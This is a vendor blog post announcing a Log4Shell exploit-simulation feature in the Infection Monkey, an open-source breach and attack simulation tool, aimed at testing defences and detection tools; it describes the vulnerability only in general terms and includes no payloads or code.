Skip to main content
Dark background with blue code overlay

Log4j Bringing You Down? Try Infection Monkey’s New Log4Shell Attack Simulation

Written by

The Infection Monkey team

February 14, 2022

What if you could see how a real cyberattack might unfold in your network? Imagine the insights you would gain into your security posture if you could safely and easily simulate the behavior of malicious actors before they hit your defenses. That’s what the Infection Monkey does. It turns mock malware loose in your environment to test what happens in a real-world attack. This allows you to use real data to evaluate how your environment stands up to an attack — rather than hypothetical scenarios and textbook suggestions.

Since December 2021, threat actors have been exploiting a software vulnerability in Apache Log4j 2, a popular Java library for logging error messages in applications. This Log4Shell vulnerability enables a remote attacker to run arbitrary code on devices running certain versions of Apache Log4j 2.

You may have taken all the recommended steps to protect your organization from Log4Shell exploits — now’s the time to put those to the test. We’ve added Log4Shell exploiter to the Infection Monkey to help you not only make certain you’re protected but also find areas where you’re not.

For example, since your last remediation effort, someone could have accidentally deployed an old version of software that’s still vulnerable. Or maybe the IDS worked yesterday but is malfunctioning for some reason today. Also, do you have visibility into whether someone has attempted to exploit a vulnerability to propagate malicious code through your network?

New capability tests for Log4Shell vulnerabilities

To help you address this critical vulnerability, Guardicore (which is now part of Akamai) has added a new Log4Shell attack simulation capability to the Infection Monkey. 

Some versions of Apache Log4j, a Java logging framework, include a logging feature called “Message Lookup Substitution” enabled by default. Malicious actors can exploit this feature by replacing certain special strings with dynamically generated strings at the time of logging. If an attacker can control log messages or log message parameters, arbitrary code can be executed. The Infection Monkey’s Log4Shell exploiter simulates an attack in which a threat actor takes advantage of this vulnerability to propagate to a victim machine.

The Infection Monkey will attempt to exploit the Log4Shell vulnerability in the following services:

  • Apache Solr

  • Apache Tomcat

  • Logstash

Even if none of these services are running in your environment, running the Log4Shell exploiter offers a good way to test your IDS/IPS or EDR solutions. These solutions should detect that the Infection Monkey is attempting to exploit the Log4Shell vulnerability and raise an appropriate alert.

At Guardicore, we believe security is an ongoing activity. That’s why we developed the Infection Monkey, a free, open source breach and attack simulation (BAS) platform. It allows you to easily and safely simulate attacks so that you can continuously test and evaluate your security posture. By enabling you to quickly simulate an attacker in your environment, the Infection Monkey helps you validate existing controls and identify how attackers might exploit your current network security gaps.

Download the latest version of the Infection Monkey.

Written by

The Infection Monkey team